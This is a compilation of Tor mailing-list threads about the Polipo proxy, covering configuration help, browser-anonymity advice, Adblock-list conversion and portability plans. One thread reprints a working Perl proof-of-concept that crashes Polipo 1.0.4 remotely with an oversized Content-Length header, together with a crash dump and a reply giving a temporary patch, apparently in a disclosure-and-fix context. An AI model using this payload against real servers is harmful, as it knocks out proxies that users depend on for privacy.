Hi, As polipo has now replaced privoxy in the default tor setup I am trying to use it, but it doesn't work. Could someone please help me do these 2 things: 1. Run polipo as a windows 2003 service. Everytime I try to start polipo as a service it crashes. I tried to set daemonise=true in the config, but this doesn't help (I have searched the web and the polipo manual, I found no other info on how to do this). Privoxy works fine as a service, why is polipo such a headache? 2. Add this proxy functionality I have with privoxy to the polipo config: -- #this directs ALL requests to the tor proxy forward-socks4a / localhost:9050 . #this forwards all requests to I2P domains to the local I2P #proxy without dns requests forward .i2p localhost: #this forwards all requests to Freenet domains to the local Freenet node #proxy without dns requests forward ksk@ localhost: forward ssk@ localhost: forward chk@ localhost: forward svk@ localhost: - (I see the tor socks is already set in the polipo config) If someone can help me out with this I could finaly move everything to polipo. Thanks. smime.p7s Description: S/MIME Cryptographic Signature
Privoxy and Polipo
hi all, what is the difference in using privoxy and polipo? im in ubuntu and have used both. and privoxy seems unable to render all .gifs file. it shows part of the gif or in some cases won't show the animation. why is this? thank you very much *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Privoxy and Polipo
arshad wrote: hi all, what is the difference in using privoxy and polipo? im in ubuntu and have used both. and privoxy seems unable to render all .gifs file. it shows part of the gif or in some cases won't show the animation. Privoxy has the ability to deanimate gifs. Check your Privoxy configuration. The Look up which actions apply to a URL and why link in Privoxy's web interface may be useful to you. Cheers, Jim *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Privoxy and Polipo
On Sun, 2009-12-27 at 04:50 -0700, Jim wrote: arshad wrote: hi all, what is the difference in using privoxy and polipo? im in ubuntu and have used both. and privoxy seems unable to render all .gifs file. it shows part of the gif or in some cases won't show the animation. Privoxy has the ability to deanimate gifs. Check your Privoxy configuration. The Look up which actions apply to a URL and why link in Privoxy's web interface may be useful to you. Cheers, Jim *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/ thanks for the reply. i looked at links. will u be kind enough to breif how to resolve the problem please? thank you. *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Privoxy and Polipo
On Sun, 2009-12-27 at 04:50 -0700, Jim wrote: arshad wrote: hi all, what is the difference in using privoxy and polipo? im in ubuntu and have used both. and privoxy seems unable to render all .gifs file. it shows part of the gif or in some cases won't show the animation. Privoxy has the ability to deanimate gifs. Check your Privoxy configuration. The Look up which actions apply to a URL and why link in Privoxy's web interface may be useful to you. Cheers, Jim *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/ thanks. now figured out a little. at first i went to that page without privoxy and didnt get the point. after going through proxy i figured it out a litte. but now i want to disable that deanaimate gif thing. but there isn't a place in config file to do that :( thank you very much *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Privoxy and Polipo
arshad wrote:
but now i want to disable that deanaimate gif thing. but there isn't a
place in config file to do that :(
The place for personal configuration in privoxy is 'user.action'.
You can append these two lines:
{-deanimate-gifs}
/ # Match all URLs
***
To unsubscribe, send an e-mail to majord...@torproject.org with
unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Privoxy and Polipo
On Sun, 2009-12-27 at 14:06 +0100, Gitano wrote:
arshad wrote:
but now i want to disable that deanaimate gif thing. but there isn't a
place in config file to do that :(
The place for personal configuration in privoxy is 'user.action'.
You can append these two lines:
{-deanimate-gifs}
/ # Match all URLs
***
To unsubscribe, send an e-mail to majord...@torproject.org with
unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
thank you for this.
i did this. and hope fully will check what happens upon rebooting the
pc. as for now it seems not working.
***
To unsubscribe, send an e-mail to majord...@torproject.org with
unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: polipo POC
Darren Thurston wrote:
#!/usr/bin/perl
# estranged.pl
# AKA
# Polipo 1.0.4 Remote Memory Corruption 0day PoC
Cute.
$payload = GET / HTTP/1.1\r\nContent-Length: 2147483602\r\n\r\n;
The proof of concept works as advertised. Wheee.
Here's a simple patch (that probably breaks some requests and is
imperfect) to stop the proof of concept while we wait on upstream to
provide a real fix for it:
--- polipo-1.0.4/client.c 2008-01-08 14:56:45.0 +0200
+++ polipo-1.0.4-fixed/client.c 2009-12-09 15:30:53.0 +0200
@@ -998,7 +998,7 @@
return 1;
}
-if(connection-reqlen connection-reqbegin) {
+if(connection-reqlen connection-reqbegin (connection-reqlen
- connection-reqbegin ) 0 ) {
memmove(connection-reqbuf, connection-reqbuf +
connection-reqbegin,
connection-reqlen - connection-reqbegin);
connection-reqlen -= connection-reqbegin;
Using memmove like that is extremely unsafe. :-(
Best,
Jacob
signature.asc
Description: OpenPGP digital signature
polipo POC
#!/usr/bin/perl
# estranged.pl
# AKA
# Polipo 1.0.4 Remote Memory Corruption 0day PoC
#
# Jeremy Brown [0xjbrow...@gmail.com//jbrownsec.blogspot.com//krakowlabs.com]
12.07.2009
#
#
*
#
# Hzzp loves you Polipo!
#
# No use reporting this issue to Ubuntu Security unless you feel like waiting
two weeks for them to sit on
# it, then UNFLAG security issue and call it a feature.
#
# I informally request that they apologize to the developers themselves x)
#
# polipo-20080907/client.c [1001-1009]:
#
# if(connection-reqlen connection-reqbegin) {
# memmove(connection-reqbuf, connection-reqbuf + connection-reqbegin,
# connection-reqlen - connection-reqbegin);
# connection-reqlen -= connection-reqbegin;
# connection-reqbegin = 0;
# } else {
# connection-reqlen = 0;
# connection-reqbegin = 0;
# }
#
# 0.9.8 / 1.0.4 tested vulnerable
#
# Program received signal SIGSEGV, Segmentation fault.
# 0x40093486 in memmove () from /lib/libc.so.6
# (gdb) i r
# eax0x8000 -2147483648
# ecx0x22
# edx0x802c -2147483604
# ebx0x80775d8 134706648
# esp0xb7f0 0xb7f0
# ebp0xb7f8 0xb7f8
# esi0x4017002d 1075249197
# edi0xc017002d -1072234451
# eip0x40093486 0x40093486
# eflags 0x1068667206
# cs 0x23 35
# ss 0x2b 43
# ds 0x2b 43
# es 0x2b 43
# fs 0x00
# gs 0x00
# (gdb) bt
#0 0x40093486 in memmove () from /lib/libc.so.6
#1 0x0805a594 in ?? ()
#2 0x4017 in ?? ()
#3 0xc017 in ?? ()
#4 0x802e in ?? ()
#5 0x0804e744 in ?? ()
#6 0x08077548 in ?? ()
#7 0x08077550 in ?? ()
#8 0x0001 in ?? ()
#9 0x000a in ?? ()
#10 0x0001 in ?? ()
#11 0x080775d8 in ?? ()
#12 0xb908 in ?? ()
#13 0x0805a458 in ?? ()
#14 0x08077498 in ?? ()
#15 0x0001 in ?? ()
#16 0x0001 in ?? ()
#17 0x0001 in ?? ()
#18 0x0001 in ?? ()
#19 0x0805eb8d in ?? ()
#20 0x in ?? ()
#21 0xb8d0 in ?? ()
#22 0xb8ac in ?? ()
#23 0xb8b0 in ?? ()
#24 0x in ?? ()
#25 0x in ?? ()
#26 0x in ?? ()
#27 0x in ?? ()
#28 0x in ?? ()
#29 0x in ?? ()
#30 0x in ?? ()
#31 0x in ?? ()
#32 0xb8b4 in ?? ()
#33 0xb8c0 in ?? ()
#34 0x in ?? ()
#35 0x in ?? ()
#36 0xb8b8 in ?? ()
#37 0xb8bc in ?? ()
#38 0x40170003 in ?? ()
#39 0x0806f803 in _IO_stdin_used ()
#40 0x08077550 in ?? ()
#41 0x4008dc91 in mallopt () from /lib/libc.so.6
# Previous frame inner to this frame (corrupt stack?)
# (gdb)
#
#(gdb) x/i $eip
#0x40093486 memmove+102: repz movsb %ds:(%esi),%es:(%edi)
#
# And my hair cannot commit, to one popular genre of music
#
#
*
# estranged.pl
use IO::Socket;
$target = $ARGV[0];
$port = 8123;
$payload = GET / HTTP/1.1\r\nContent-Length: 2147483602\r\n\r\n;
$sock = IO::Socket::INET-new(Proto='tcp', PeerHost=$target, PeerPort=$port)
or die Error: $target:$port\n;
$sock-send($payload);
close($sock);
***
To unsubscribe, send an e-mail to majord...@torproject.org with
unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Increasing Polipo Portability for GSoC 2009
On Tue, May 05, 2009 at 08:37:28AM -0700, Wesley Kenzie wrote: Hi, Christopher. If you could also solve the known instability issues with polipo that Juliusz has not had time to resolve in the past year, then many would be grateful. I cannot get polipo to run for more than about an hour without it crashing. . . . . . Wesley I should be able to take a look at this if there's time. -- Christopher Davis Mangrin Remailer Admin PGP: 0x0F8DA163
Increasing Polipo Portability for GSoC 2009
Hello, I'll be working to increase Polipo's portability for GSoC 2009, which starts a bit later this month. I'm happy to have Nick Mathewson of the Tor project as my mentor, and I'll also be working with Juliusz Chroboczek, author of Polipo, to hopefully get some of the changes committed. The main idea of the project centers on libevent integration. A number of other prominent projects use the library, including Tor, and so there are more avenues for bug fixes. To start with, integration will be basic, but it will be enough to take advantage of platform-specific interfaces for polling large numbers of file descriptors, as well as libevent's portable asynchronous DNS resolver. Another part of the project is to add a simple controller application (which will typically be run in the system tray). This is mainly to enable Windows users to signal Polipo at run-time. There are some smaller bits I'd like to tackle, as well, including adding a Windows installer and autotools support for automatically finding dependencies. I'm looking forward to the summer. Thanks, -- Christopher Davis Mangrin Remailer Admin PGP: 0x0F8DA163
Re: Increasing Polipo Portability for GSoC 2009
Hi, Christopher. If you could also solve the known instability issues with polipo that Juliusz has not had time to resolve in the past year, then many would be grateful. I cannot get polipo to run for more than about an hour without it crashing. . . . . . Wesley On Tue, May 5, 2009 at 12:10 AM, Christopher Davis chr...@mangrin.orgwrote: Hello, I'll be working to increase Polipo's portability for GSoC 2009, which starts a bit later this month. I'm happy to have Nick Mathewson of the Tor project as my mentor, and I'll also be working with Juliusz Chroboczek, author of Polipo, to hopefully get some of the changes committed. The main idea of the project centers on libevent integration. A number of other prominent projects use the library, including Tor, and so there are more avenues for bug fixes. To start with, integration will be basic, but it will be enough to take advantage of platform-specific interfaces for polling large numbers of file descriptors, as well as libevent's portable asynchronous DNS resolver. Another part of the project is to add a simple controller application (which will typically be run in the system tray). This is mainly to enable Windows users to signal Polipo at run-time. There are some smaller bits I'd like to tackle, as well, including adding a Windows installer and autotools support for automatically finding dependencies. I'm looking forward to the summer. Thanks, -- Christopher Davis Mangrin Remailer Admin PGP: 0x0F8DA163
Re: Increasing Polipo Portability for GSoC 2009
On Tue, May 5, 2009 at 12:10 AM, Christopher Davis chr...@mangrin.orgwrote: Hello, I'll be working to increase Polipo's portability for GSoC 2009, which starts a bit later this month. I'm happy to have Nick Mathewson of the Tor project as my mentor, and I'll also be working with Juliusz Chroboczek, author of Polipo, to hopefully get some of the changes committed. I thought Polipo was already portable. I've been using it with D.A.D. on a USB drive for over a year, and haven't had any problems. The main idea of the project centers on libevent integration. A number of other prominent projects use the library, including Tor, and so there are more avenues for bug fixes. To start with, integration will be basic, but it will be enough to take advantage of platform-specific interfaces for polling large numbers of file descriptors, as well as libevent's portable asynchronous DNS resolver. Cool. Another part of the project is to add a simple controller application (which will typically be run in the system tray). This is mainly to enable Windows users to signal Polipo at run-time. That would be nice. As I use it right now, it's quietly running in the background. There are some smaller bits I'd like to tackle, as well, including adding a Windows installer and autotools support for automatically finding dependencies. I'm looking forward to the summer. Looking forward to your results. - Kyle
Re: Increasing Polipo Portability for GSoC 2009
On Tue, May 05, 2009 at 04:16:07PM -0700, Kyle Williams wrote: I'll be working to increase Polipo's portability for GSoC 2009, I thought Polipo was already portable. I've been using it with D.A.D. on a USB drive for over a year, and haven't had any problems. In software development lingo, portability has to do with whether a program compiles and runs on a variety of architectures and operating systems. It's a different term than the collection of portable foo programs that aim to be run without needing system libraries/etc. --Roger
polipo - choosing an exit
Hi, I'm using polipo. When I choose an exit node by sticking node.exit on the end of a url, I think that is actually passed on with the Host header. How do I get polipo to strip that off? For example, http://www.showmyip.com.tortila.exit/; doesn't work as it has no vhost set up for www.showmyip.com.tortila.exit. Also, if the html returned by that page contained eg: img src=http://www.showmyip.com/foo.jpg; / am I correct in thinking that that request wouldn't necessarily go out via the same exit node I chose for the main page? -- Dawn
Annoying polipo problem on linux
Hi, I'm trying to switch from privoxy to polipo. But polipo seems to have an annoying problem. Polipo gets started as a service while booting, the same as I did with privoxy. But tor gets just started with activating Vidalia. The problem is if tor is not running when polipo gets started it doesn't use it! I mean if I start Vidalia+Tor and Polipo has been started before Polipo doesn't use Tor. But I can't start tor before polipo because I wanna use it with Vidalia. So I have every boot to manually start polipo with sudo /etc/init.d/polipo start. Has anyone a workaround for this? greets
Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)
: a bobnjoe browser : For the crass foreigners among us -- what does this idiom mean? Bob Joe's Bait, Tackle, and Web Browsers [...] Sorry for the confusion. Quite the opposite -- thanks to you for the snippet of local colour. Juliusz
Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)
On Thu, Oct 18, 2007 at 12:54:30AM +0200, [EMAIL PROTECTED] wrote 0.1K bytes in 5 lines about: : a bobnjoe browser : : For the crass foreigners among us -- what does this idiom mean? It's a phobosism as a result of growing up in a rural area. I meant it as a very small population of users. Such as if Bob Joe's Bait, Tackle, and Web Browsers was a real store serving a small portion of the local area. This means users of BobnJoe's browser would stand out in a crowd. Sorry for the confusion. -- Andrew
Re: Incognito Live CD using Polipo
On Tuesday 09 October 2007, Juliusz Chroboczek wrote: It's fairly easy to convert the adblock plus 'easylist' into a polipo forbidden file. Do you have a script you'd be willing to share? I'd be glad to link to it from the Polipo page. Juliusz Here's one: https://tor-svn.freehaven.net/svn/incognito/trunk/adblockplusfilter2polipo.sh Patches welcome. -- Pat Double, [EMAIL PROTECTED] Ye must be born again. - John 3:7 signature.asc Description: This is a digitally signed message part.
Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)
On Sunday 14 October 2007 19:50:38 [EMAIL PROTECTED] wrote: On Sat, Oct 13, 2007 at 09:21:40AM +0100, [EMAIL PROTECTED] wrote 0.9K bytes in 30 lines about: : Do: : Spoof user-agent (is this necessary even with javascript disabled?) : (browser) Arguably, unless you're using BobnJoe's browser, any of the popular ones should provide sufficient numbers (firefox, safari, opera, ie). konqueror, a bobnjoe browser if ever there was one, can only turn off sending the user-agent and spoof it for selected websites. it doesn't even support regexes. : Spoof http-headers as though a US english browser (browser/privacy : proxy?) Only if you want to appear as coming from the US, and if you read English. If you're in UAE and spoofing US English, then you may stand out for being different. But no-one should know you're in the UAE because you're using tor. Or have I missed your point? : Do not: : Use tabs (enforced/recommended by controller?) Why? : Keep the browser open when finished 'using tor' (enforced/recommended by : controller?) If your browser properly cleans up and you've disabled everything, chances are this isn't that big of a deal. for both, javascript timers apparently. a separate browser or open-and-close browser session seems to be the thing. signature.asc Description: This is a digitally signed message part.
Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)
People will know that you are in the UAE if you are browsing websites that are only for people and used by people in the UAE. Kasimir Gabert On 10/15/07, Robert Hogan [EMAIL PROTECTED] wrote: On Sunday 14 October 2007 19:50:38 [EMAIL PROTECTED] wrote: On Sat, Oct 13, 2007 at 09:21:40AM +0100, [EMAIL PROTECTED] wrote 0.9K bytes in 30 lines about: : Do: : Spoof user-agent (is this necessary even with javascript disabled?) : (browser) Arguably, unless you're using BobnJoe's browser, any of the popular ones should provide sufficient numbers (firefox, safari, opera, ie). konqueror, a bobnjoe browser if ever there was one, can only turn off sending the user-agent and spoof it for selected websites. it doesn't even support regexes. : Spoof http-headers as though a US english browser (browser/privacy : proxy?) Only if you want to appear as coming from the US, and if you read English. If you're in UAE and spoofing US English, then you may stand out for being different. But no-one should know you're in the UAE because you're using tor. Or have I missed your point? : Do not: : Use tabs (enforced/recommended by controller?) Why? : Keep the browser open when finished 'using tor' (enforced/recommended by : controller?) If your browser properly cleans up and you've disabled everything, chances are this isn't that big of a deal. for both, javascript timers apparently. a separate browser or open-and-close browser session seems to be the thing. -- Kasimir Gabert
Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)
On 10/15/07, Robert Hogan [EMAIL PROTECTED] wrote: On Sunday 14 October 2007 19:50:38 [EMAIL PROTECTED] wrote: On Sat, Oct 13, 2007 at 09:21:40AM +0100, [EMAIL PROTECTED] wrote 0.9K bytes in 30 lines about: : Do: : Spoof user-agent (is this necessary even with javascript disabled?) : (browser) Arguably, unless you're using BobnJoe's browser, any of the popular ones should provide sufficient numbers (firefox, safari, opera, ie). konqueror, a bobnjoe browser if ever there was one, can only turn off sending the user-agent and spoof it for selected websites. it doesn't even support regexes. : Spoof http-headers as though a US english browser (browser/privacy : proxy?) Only if you want to appear as coming from the US, and if you read English. If you're in UAE and spoofing US English, then you may stand out for being different. But no-one should know you're in the UAE because you're using tor. Or have I missed your point? : Do not: : Use tabs (enforced/recommended by controller?) Why? : Keep the browser open when finished 'using tor' (enforced/recommended by : controller?) If your browser properly cleans up and you've disabled everything, chances are this isn't that big of a deal. for both, javascript timers apparently. a separate browser or open-and-close browser session seems to be the thing. On 10/15/07, Kasimir Gabert [EMAIL PROTECTED] wrote: People will know that you are in the UAE if you are browsing websites that are only for people and used by people in the UAE. Kasimir Gabert Unfortunately, I top posted! I am sorry, this is where my message should end up. Reason: Too hasty typing with GMail at a library. My most ernest apologies. -- Kasimir Gabert
Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)
On Sat, Oct 13, 2007 at 09:21:40AM +0100, [EMAIL PROTECTED] wrote 0.9K bytes in 30 lines about: : Do: : Spoof user-agent (is this necessary even with javascript disabled?) (browser) Arguably, unless you're using BobnJoe's browser, any of the popular ones should provide sufficient numbers (firefox, safari, opera, ie). : Spoof http-headers as though a US english browser (browser/privacy proxy?) Only if you want to appear as coming from the US, and if you read English. If you're in UAE and spoofing US English, then you may stand out for being different. : Do not: : Use tabs (enforced/recommended by controller?) Why? : Keep the browser open when finished 'using tor' (enforced/recommended by : controller?) If your browser properly cleans up and you've disabled everything, chances are this isn't that big of a deal. -- Andrew
Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)
On Friday 12 October 2007 00:26:46 [EMAIL PROTECTED] wrote: On Thu, Oct 11, 2007 at 08:57:48PM +0100, [EMAIL PROTECTED] wrote 1.1K bytes in 29 lines about: : Keeping track of all the things you should turn off or get a proxy to : tweak makes my feeble head hurt. The latest torbutton-dev releases handle most of this for you. So for any browser without torbutton the list of things to do while using tor is: Turn off: Javascript (browser) Java (browser) Plugins (browser) Cookies (browser) Referer Headers (privacy proxy) Caching (browser) History reads/writes (browser) Do: Spoof user-agent (is this necessary even with javascript disabled?) (browser) Spoof http-headers as though a US english browser (browser/privacy proxy?) Do not: Use tabs (enforced/recommended by controller?) Keep the browser open when finished 'using tor' (enforced/recommended by controller?) Anything to add/remove/clarify?
Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)
Robert Hogan schrieb: Do: Spoof user-agent (is this necessary even with javascript disabled?) (browser) I think, it is nessecary. Do this job in browser, because no proxy can do it for SSL-encrypted stuff. And change the fake time by time. You may try showmyip with and without javascript. In both cases you see the user agent: http://www.showmyip.com/?version=full
Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)
TOR Admin (gpfTOR1) wrote: Robert Hogan schrieb: Do: Spoof user-agent (is this necessary even with javascript disabled?) (browser) I think, it is nessecary. Do this job in browser, because no proxy can do it for SSL-encrypted stuff. And change the fake time by time. I disagree. Don't do anything that makes you stand out. That includes changing to a multitude of fake user-agents. Pick the most common user-agent and use it. That's probably whatever the latest version of Firefox returns. (I'm assuming Tor traffic is firefox-heavy - I may be wrong on this. IE6 or IE7 may be a better choice. Remember, they can tell you're probably coming from Tor, so you want to blend in with average Tor traffic.) Then only change it if the most popular browser changes. That way you blend in with the herd. It's easy to track the guy who's using Bob's Krazy Web Browzur one day, and xXxDeAtHxXx the next day, and lol ive got a new useragent today after that. It's not so easy to track one guy out of ten thousand using Firefox. -Ben
Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)
Ben Wilhelm schrieb: Pick the most common user-agent and use it. That's probably whatever the latest version of Firefox returns. Ok, I use (only a few examples): Mozilla/5.0 (Macintosh; U; PPC Mac OS X; sk-SK; rv:1.8.1.6) Gecko/20070824 Firefox/2.0.0.6 Mozilla/5.0 (X11; U; Linux i586; de-DE; rv:1.8.1.6) Gecko/20070920 Firefox/2.0.0.6 Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1.6) Gecko/20070901 Firefox/2.0.0.6 Mozilla/5.0 (X11; U; Linux i686; de-CH; rv:1.8.1.6) Gecko/20070917 Firefox/2.0.0.6 Mozilla/5.0 (X11; U; FreeBSD i386; de-DE; rv:1.8.1.6) Gecko/20070807 Firefox/2.0.0.6 Mozilla/5.0 (X11; U; FreeBSD amd64; en-US; rv:1.8.1.6) Gecko/20070927 Firefox/2.0.0.6 Mozilla/5.0 (X11; U; SunOS i86pc; en-AU; rv:1.8.1.6) Gecko/20070926 Firefox/2.0.0.6 All user-agents are Firefox. Some are not very common, may be. A user-agent is more the Firefox/2.0.0.6 I use the tool uagen written bei F. Keil.
Re: Incognito Live CD using Polipo
On Thursday 11 October 2007, Robert Hogan wrote: On Wednesday 10 October 2007 13:20:31 Pat Double wrote: On Tuesday 09 October 2007, Juliusz Chroboczek wrote: You should use RefControl https://addons.mozilla.org/en-US/firefox/addon/953 to spoof referrers headers, not Polipo, as RefControl does HTTPS and HTTP. Yep. In all cases, doing things in the browser is better than doing them in the proxy. However, I understand that Pat is trying to be at least somewhat browser-agnostic. I'm not sure my goal of providing more than Firefox as a web browser is a good idea. It is known that Tor is not enough to make you anonymous, hence all these extensions that are installed in Firefox. The problem is that not all of the same features are available on Konqueror or links. I can't remove Konqueror since it also does file management, but I think links I should remove. And the desktop link to Konq may need to be removed as well. Keeping track of all the things you should turn off or get a proxy to tweak makes my feeble head hurt. Turn off: Plugins, Java, Javascript, ads Tweak: Referrers Um, what else? I'm confused. We need a list. No kidding :) I did find Konqueror has the features that are needed (I think, we need a list.) I should do more research before sending email, but TorK indeed disables the necessary things and Konqueror supports AdBlock filters so I added the same filter for FireFox AdBlock Plus to Konqueror. I kept links as anonym made a good point the only users running links most likely know what they are doing. -- Pat Double, [EMAIL PROTECTED] Ye must be born again. - John 3:7 signature.asc Description: This is a digitally signed message part.
Re: Incognito Live CD using Polipo
On Thu, Oct 11, 2007 at 08:57:48PM +0100, [EMAIL PROTECTED] wrote 1.1K bytes in 29 lines about: : Keeping track of all the things you should turn off or get a proxy to tweak : makes my feeble head hurt. The latest torbutton-dev releases handle most of this for you. -- Andrew
Re: Incognito Live CD using Polipo
On Tuesday 09 October 2007, Juliusz Chroboczek wrote: You should use RefControl https://addons.mozilla.org/en-US/firefox/addon/953 to spoof referrers headers, not Polipo, as RefControl does HTTPS and HTTP. Yep. In all cases, doing things in the browser is better than doing them in the proxy. However, I understand that Pat is trying to be at least somewhat browser-agnostic. I'm not sure my goal of providing more than Firefox as a web browser is a good idea. It is known that Tor is not enough to make you anonymous, hence all these extensions that are installed in Firefox. The problem is that not all of the same features are available on Konqueror or links. I can't remove Konqueror since it also does file management, but I think links I should remove. And the desktop link to Konq may need to be removed as well. -- Pat Double, [EMAIL PROTECTED] Ye must be born again. - John 3:7 signature.asc Description: This is a digitally signed message part.
Re: Incognito Live CD using Polipo
On Tuesday 09 October 2007, Juliusz Chroboczek wrote: It's fairly easy to convert the adblock plus 'easylist' into a polipo forbidden file. Do you have a script you'd be willing to share? I'd be glad to link to it from the Polipo page. If phobos doesn't have a script I'll most likely write one. The problem would be that the 'easylist' also includes a whitelist at the end, I assume that all patterns are scanned from start to end and if something is blacklisted AND whitelisted, it is allowed. AFAIK Polipo only provides a blacklist. -- Pat Double, [EMAIL PROTECTED] Ye must be born again. - John 3:7 signature.asc Description: This is a digitally signed message part.
Re: Incognito Live CD using Polipo
If phobos doesn't have a script I'll most likely write one. The problem would be that the 'easylist' also includes a whitelist at the end, I assume that all patterns are scanned from start to end and if something is blacklisted AND whitelisted, it is allowed. AFAIK Polipo only provides a blacklist. If you provide me with the precise semantics of the whitelist, I can implement something compatible in Polipo. Juliusz
Re: Incognito Live CD using Polipo
On Wednesday 10 October 2007, Juliusz Chroboczek wrote: If phobos doesn't have a script I'll most likely write one. The problem would be that the 'easylist' also includes a whitelist at the end, I assume that all patterns are scanned from start to end and if something is blacklisted AND whitelisted, it is allowed. AFAIK Polipo only provides a blacklist. If you provide me with the precise semantics of the whitelist, I can implement something compatible in Polipo. Is this what you're looking for? http://adblockplus.org/en/filters -- Pat Double, [EMAIL PROTECTED] Ye must be born again. - John 3:7 signature.asc Description: This is a digitally signed message part.
Re: Incognito Live CD using Polipo
On Wed, Oct 10, 2007 at 07:32:31AM -0500, [EMAIL PROTECTED] wrote 1.1K bytes in 39 lines about: : Do you have a script you'd be willing to share? I'd be glad to link : to it from the Polipo page. : : If phobos doesn't have a script I'll most likely write one. The problem would : be that the 'easylist' also includes a whitelist at the end, I assume that : all patterns are scanned from start to end and if something is blacklisted : AND whitelisted, it is allowed. AFAIK Polipo only provides a blacklist. I haven't scripted the conversion from adblock plus to forbidden file yet. I do strip out the whitelists. I'm doing this in vi: abp: *hitbox* polipo forbidden: .*\.hitbox And that's as fancy as I get for now. I lack the time to write a decent script and handle all of the regex issues. -- Andrew
